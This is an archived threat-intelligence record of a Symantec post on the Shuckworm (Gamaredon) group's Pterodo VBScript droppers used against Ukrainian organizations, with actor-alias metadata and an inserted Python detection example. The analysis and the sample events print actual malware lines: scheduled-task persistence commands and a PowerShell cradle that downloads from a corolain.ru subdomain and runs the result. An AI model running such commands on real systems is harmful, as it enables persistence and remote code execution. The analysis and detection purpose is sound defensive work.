{
	"id": "b459124c-ab39-428b-b6d1-b5f94d86d156",
	"created_at": "2026-04-06T00:13:39.089892Z",
	"updated_at": "2026-04-10T03:37:04.202959Z",
	"deleted_at": null,
	"sha1_hash": "c444be7de57a435a484792660cd28278d7723fd3",
	"title": "Shuckworm: Espionage Group Continues Intense Campaign Against Ukraine",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 44551,
	"plain_text": "Shuckworm: Espionage Group Continues Intense Campaign Against Ukraine\r\nArchived: 2026-04-05 16:59:22 UTC\r\nThe Russian-linked Shuckworm espionage group (aka Gamaredon, Armageddon) is continuing to mount an intense cyber campaign against organizations in Ukraine.\r\nShuckworm has almost exclusively focused its operations on Ukraine since it first appeared in 2014. These attacks have continued unabated since the Russian invasion of the country. While the group’s tools and tactics are simple and sometimes crude, the frequency and persistence of its attacks mean that it remains one of the key cyber threats facing organizations in the region.\r\nMultiple payloads\r\nOne of the hallmarks of the group’s recent activity is the deployment of multiple malware payloads on targeted computers. These payloads are usually different variants of the same malware (Backdoor.Pterodo), designed to perform similar tasks. Each will communicate with a different command-and-control (C\u0026C) server.\r\nThe most likely reason for using multiple variants is that it may provide a rudimentary way of maintaining persistence on an infected computer. If one payload or C\u0026C server is detected and blocked, the attackers can fall back on one of the others and roll out more new variants to compensate.\r\nSymantec’s Threat Hunter Team, part of Broadcom Software, has found four distinct variants of Pterodo being used in recent attacks. All of them are Visual Basic Script (VBS) droppers with similar functionality. They will drop a VBScript file, use Scheduled Tasks (schtasks.exe) to maintain persistence, and download additional code from a C\u0026C server. 
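Added detection example (Python, not code from the Symantec post or from Pterodo itself): the checks below run over constructed process-creation and DNS events and flag the behaviours this section summarises, namely a schtasks.exe /CREATE whose action is wscript.exe with the engine forced to VBScript (the Pterodo.B persistence shown later on the page), wscript.exe started with //e:VBScript on a file whose extension is not a script type (the .tbi and .ql files of Pterodo.C and D), and a PowerShell command line that feeds DownloadString output to Invoke-Expression after resolving a Get-Random subdomain (the offspring.gif cradle). The sample events, the victim profile path and the log field names are invented for the example, and the DNS rule that treats an all-digit leftmost label under corolain.ru as suspicious is an inference from Get-Random returning an integer rather than something the post states.

```python
# Added detection example (not from the Symantec post): heuristics for the Pterodo dropper
# behaviours described on this page, run over constructed process-creation and DNS events.
import re
from dataclasses import dataclass

BS, DQ = chr(92), chr(34)  # backslash / double quote via chr() so the samples need no escapes
SCRIPT_HOSTS = ('wscript', 'cscript')
SCRIPT_EXTS = ('.vbs', '.vbe', '.js', '.jse', '.wsf', '.wsh')

@dataclass
class ProcessEvent:
    image: str         # executable that started (hypothetical log field names)
    command_line: str  # full command line as a process-creation log records it

def _norm(cmd: str) -> str:
    # lowercase, drop quotes, collapse whitespace so //e VBScript and //e:VBScript parse alike
    return ' '.join(cmd.lower().replace(DQ, '').split())

def _vbscript_forced(norm: str) -> bool:
    return '//e:vbscript' in norm or '//e vbscript' in norm

def _basename(path: str) -> str:
    return path.replace(BS, '/').rsplit('/', 1)[-1].lower()

def check_schtasks_persistence(ev: ProcessEvent) -> list:
    # Pterodo.B: SCHTASKS /CREATE /sc minute /mo 10 ... /tr wscript.exe <dropped file> //b //e VBScript
    findings = []
    if _basename(ev.image) != 'schtasks.exe':
        return findings
    norm = _norm(ev.command_line)
    if '/create' not in norm or ' /tr ' not in norm:
        return findings
    action = norm.split(' /tr ', 1)[1]
    if any(h in action for h in SCRIPT_HOSTS) and _vbscript_forced(action):
        findings.append('scheduled task runs wscript with the engine forced to VBScript')
        if '/sc minute' in norm:
            findings.append('task fires every N minutes, a beaconing-style schedule')
    return findings

def check_script_host(ev: ProcessEvent) -> list:
    # Pterodo.C/D: wscript <file>.tbi|.ql //e:VBScript; the override hides the real file type
    findings = []
    if _basename(ev.image) not in ('wscript.exe', 'cscript.exe'):
        return findings
    norm = _norm(ev.command_line)
    args = [t for t in norm.split()[1:] if not t.startswith('/')]
    if _vbscript_forced(norm) and args:
        name = _basename(args[0])
        ext = '.' + name.rsplit('.', 1)[-1] if '.' in name else '(none)'
        if ext not in SCRIPT_EXTS:
            findings.append('VBScript engine forced on a non-script extension ' + ext)
    return findings

def check_powershell_cradle(ev: ProcessEvent) -> list:
    # offspring.gif: DownloadString(...) handed to Invoke-Expression, host chosen via Get-Random + DNS
    findings = []
    if _basename(ev.image) not in ('powershell.exe', 'pwsh.exe'):
        return findings
    norm = _norm(ev.command_line)
    executes = 'invoke-expression' in norm or re.search(r'(^|[^a-z])iex([^a-z]|$)', norm)
    if 'downloadstring' in norm and executes:
        findings.append('download cradle: web content passed to Invoke-Expression')
    if 'gethostaddresses' in norm and 'get-random' in norm:
        findings.append('C2 address resolved from a Get-Random subdomain')
    return findings

def check_dns_random_subdomain(query: str, watched=('corolain.ru',)) -> bool:
    # Get-Random with no arguments yields an integer, so the lookups look like <digits>.corolain.ru;
    # an all-digit leftmost label under a watched domain is the DNS-side signal (an inference, not from the post)
    q = query.lower().rstrip('.')
    for domain in watched:
        if q.endswith('.' + domain):
            return q[: -(len(domain) + 1)].isdigit()
    return False

def analyze(events: list) -> list:
    hits = []
    for idx, ev in enumerate(events):
        for check in (check_schtasks_persistence, check_script_host, check_powershell_cradle):
            hits.extend((idx, f) for f in check(ev))
    return hits

# Constructed sample events: three mirror behaviours in the post, three are benign controls.
HOME = 'C:' + BS + 'Users' + BS + 'victim' + BS
SYS32 = 'C:' + BS + 'Windows' + BS + 'System32' + BS
PS = SYS32 + 'WindowsPowerShell' + BS + 'v1.0' + BS + 'powershell.exe'
SAMPLE_EVENTS = [
    ProcessEvent(SYS32 + 'schtasks.exe', 'SCHTASKS /CREATE /sc minute /mo 10 /tn UDPSync /tr wscript.exe '
                 + HOME + 'ntusers.ini jewels //b joking //e VBScript joyful /F'),
    ProcessEvent(SYS32 + 'wscript.exe', 'wscript ' + HOME + 'lubszfpsqcrblebyb.tbi //e:VBScript /w /ylq /ib /bxk //b /pgs'),
    ProcessEvent(PS, '''powershell -c $tmp = $(New-Object net.webclient).DownloadString('http://'+'''
                 '''[System.Net.DNS]::GetHostAddresses([string]$(Get-Random)+'.corolain.ru')+'/get.php'); Invoke-Expression $tmp'''),
    ProcessEvent(SYS32 + 'schtasks.exe', 'schtasks /Create /SC DAILY /TN NightlyBackup /TR ' + SYS32 + 'backup.exe'),
    ProcessEvent(SYS32 + 'wscript.exe', 'wscript ' + HOME + 'logon.vbs'),
    ProcessEvent(PS, 'powershell -c Get-Process | Sort-Object CPU'),
]

if __name__ == '__main__':
    for idx, finding in analyze(SAMPLE_EVENTS):
        print(idx, _basename(SAMPLE_EVENTS[idx].image), '->', finding)
    print(check_dns_random_subdomain('1698521476.corolain.ru'), check_dns_random_subdomain('www.corolain.ru'))
```

The three malicious samples produce five findings and the three benign controls none. The checks deliberately key on the engine override and the download-then-execute pattern rather than on the random file names or the junk switches (jewels, joking, /ylq), which the group changes between variants; the domain list in check_dns_random_subdomain is the part a hunter would extend with the IOCs published alongside the post.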
All of the embedded VBScripts were very similar to one another and used similar obfuscation techniques.\r\nBackdoor.Pterodo.B\r\nThis variant is a modified self-extracting archive containing obfuscated VBScripts in resources that can be unpacked with 7-Zip.\r\nIt then registers them as scheduled tasks (repeating every 10 minutes) to ensure persistence:\r\nCreateObject(\"Shell.Application\").ShellExecute \"SCHTASKS\", \"/CREATE /sc minute /mo 10 /tn \" + \"\"\"UDPSync\"\" /tr \"\"wscript.exe \"\"\" + hailJPT + \"\"\"\" \u0026 \" jewels  //b  joking //e VBScript joyful \"\" /F \", \"\" , \"\" , 0\r\nCreateObject(\"Shell.Application\").ShellExecute \"SCHTASKS\", \"/CREATE /sc minute /mo 10 /tn \" + \"\"\"SyncPlayer\"\" /tr \"\"wscript.exe \"\"\" + enormouslyAKeIXNE + \"\"\"\" + \" jewels  //b  joking //e VBScript joyful \"\" /F \", \"\" , \"\" , 0\r\nThe script also copies itself to the file [USERPROFILE]\\ntusers.ini.\r\nThe two newly created files are more obfuscated VBScripts. The first is designed to gather system information, such as the serial number of the C: drive, and sends this information to a C\u0026C server. The second adds another layer of persistence by copying the previously dropped ntusers.ini file to a second file, desktop.ini.\r\nBackdoor.Pterodo.C\r\nThis variant is also designed to drop VBScripts on the infected computer. When run, it will first engage in API hammering, making multiple meaningless API calls, which is presumably an attempt to avoid sandbox detection. It will then unpack a script and a file called offspring.gif to C:\\Users\\[username]\\. It will call the script with:\r\n\"wscript \"[USERNAME]\\lubszfpsqcrblebyb.tbi\" //e:VBScript /w /ylq /ib /bxk  //b /pgs\"\r\nThis script runs ipconfig /flushdns and executes the offspring.gif file. 
The offspring.gif file resolves a random subdomain of corolain.ru, downloads a PowerShell script from the address that lookup returns, and executes it:\r\ncvjABuNZjtPirKYVchnpGVop = \"$tmp = $(New-Object net.webclient).DownloadString('http://'+[System.Net.DNS]::GetHostAddresses([string]$(Get-Random)+'.corolain.ru') +'/get.php'); Invoke-Expression $tmp\"\r\nBackdoor.Pterodo.D\r\nThis variant is another VBScript dropper. It will create two files:\r\n[USERPROFILE]\\atwuzxsjiobk.ql\r\n[USERPROFILE]\\abide.wav\r\nIt executes them with the following command:\r\nwscript \"[USERPROFILE]\\atwuzxsjiobk.ql\" //e:VBScript /tfj /vy /g /cjr /rxia  //b /pyvc\r\nSimilar to the other variants, the first script will run ipconfig /flushdns before calling the second script and removing the original executable.\r\nThe second script has two layers of obfuscation, but in the end it downloads the final payload from the domain declined.delivered.maizuko[.]ru and executes it.\r\nBackdoor.Pterodo.E\r\nThe final variant is functionally very similar to variants B and C, engaging in API hammering before extracting two VBScript files to the user’s home directory. Script obfuscation is very similar to that of the other variants.\r\nOther tools\r\nWhile the attackers have made heavy use of Pterodo during recent weeks, other tools have also been deployed alongside it. 
These include UltraVNC, an open-source remote-administration (remote desktop) utility. UltraVNC has previously been used by Shuckworm in multiple attacks.\r\nIn addition to this, Shuckworm has also been observed using Process Explorer, a Microsoft Sysinternals tool that shows which handles and DLLs processes have opened or loaded.\r\nPersistent threat\r\nWhile Shuckworm is not the most tactically sophisticated espionage group, it compensates for this with its focus and persistence in relentlessly targeting Ukrainian organizations. It appears that Pterodo is being continuously redeveloped by the attackers in a bid to stay ahead of detection.\r\nWhile Shuckworm appears to be largely focused on intelligence gathering, its attacks could also potentially be a precursor to more serious intrusions, if the access it acquires to Ukrainian organizations is turned over to other Russian-sponsored actors.\r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nA full list of IOCs is available here on GitHub.\r\nIf an IOC is malicious and the file is available to us, Symantec Endpoint products will detect and block that file.\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-intense-campaign-ukraine",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-intense-campaign-ukraine"
	],
	"report_names": [
		"shuckworm-intense-campaign-ukraine"
	],
	"threat_actors": [
		{
			"id": "81bd7107-6b2d-45c9-9eea-1843d4b9b308",
			"created_at": "2022-10-25T15:50:23.320841Z",
			"updated_at": "2026-04-10T02:00:05.356444Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Gamaredon Group",
				"IRON TILDEN",
				"Primitive Bear",
				"ACTINIUM",
				"Armageddon",
				"Shuckworm",
				"DEV-0157",
				"Aqua Blizzard"
			],
			"source_name": "MITRE:Gamaredon Group",
			"tools": [
				"QuietSieve",
				"Pteranodon",
				"Remcos",
				"PowerPunch"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d5156b55-5d7d-4fb2-836f-861d2e868147",
			"created_at": "2023-01-06T13:46:38.557326Z",
			"updated_at": "2026-04-10T02:00:03.023048Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"ACTINIUM",
				"DEV-0157",
				"Blue Otso",
				"G0047",
				"IRON TILDEN",
				"PRIMITIVE BEAR",
				"Shuckworm",
				"UAC-0010",
				"BlueAlpha",
				"Trident Ursa",
				"Winterflounder",
				"Aqua Blizzard",
				"Actinium"
			],
			"source_name": "MISPGALAXY:Gamaredon Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "61940e18-8f90-4ecc-bc06-416c54bc60f9",
			"created_at": "2022-10-25T16:07:23.659529Z",
			"updated_at": "2026-04-10T02:00:04.703976Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Actinium",
				"Aqua Blizzard",
				"Armageddon",
				"Blue Otso",
				"BlueAlpha",
				"Callisto",
				"DEV-0157",
				"G0047",
				"Iron Tilden",
				"Operation STEADY#URSA",
				"Primitive Bear",
				"SectorC08",
				"Shuckworm",
				"Trident Ursa",
				"UAC-0010",
				"UNC530",
				"Winterflounder"
			],
			"source_name": "ETDA:Gamaredon Group",
			"tools": [
				"Aversome infector",
				"BoneSpy",
				"DessertDown",
				"DilongTrash",
				"DinoTrain",
				"EvilGnome",
				"FRAUDROP",
				"Gamaredon",
				"GammaDrop",
				"GammaLoad",
				"GammaSteel",
				"Gussdoor",
				"ObfuBerry",
				"ObfuMerry",
				"PlainGnome",
				"PowerPunch",
				"Pteranodon",
				"Pterodo",
				"QuietSieve",
				"Remcos",
				"RemcosRAT",
				"Remote Manipulator System",
				"Remvio",
				"Resetter",
				"RuRAT",
				"SUBTLE-PAWS",
				"Socmer",
				"UltraVNC"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "236a8303-bf12-4787-b6d0-549b44271a19",
			"created_at": "2024-06-04T02:03:07.966137Z",
			"updated_at": "2026-04-10T02:00:03.706923Z",
			"deleted_at": null,
			"main_name": "IRON TILDEN",
			"aliases": [
				"ACTINIUM ",
				"Aqua Blizzard ",
				"Armageddon",
				"Blue Otso ",
				"BlueAlpha ",
				"Dancing Salome ",
				"Gamaredon",
				"Gamaredon Group",
				"Hive0051 ",
				"Primitive Bear ",
				"Shuckworm ",
				"Trident Ursa ",
				"UAC-0010 ",
				"UNC530 ",
				"WinterFlounder "
			],
			"source_name": "Secureworks:IRON TILDEN",
			"tools": [
				"Pterodo"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434419,
	"ts_updated_at": 1775792224,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c444be7de57a435a484792660cd28278d7723fd3.pdf",
		"text": "https://archive.orkl.eu/c444be7de57a435a484792660cd28278d7723fd3.txt",
		"img": "https://archive.orkl.eu/c444be7de57a435a484792660cd28278d7723fd3.jpg"
	}
}